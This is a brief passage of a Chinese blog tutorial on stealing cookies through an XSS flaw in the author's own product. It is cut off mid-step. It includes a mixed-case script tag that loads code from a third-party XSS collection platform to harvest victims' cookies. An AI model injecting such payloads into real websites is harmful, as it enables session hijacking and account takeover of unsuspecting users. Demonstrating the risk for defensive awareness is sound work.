利用xss漏洞窃取cookie登录

今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 <sCRiPt sRC=http://xss.fbisb.com/10bt></sCrIpT> 保
相关文章
相关标签/搜索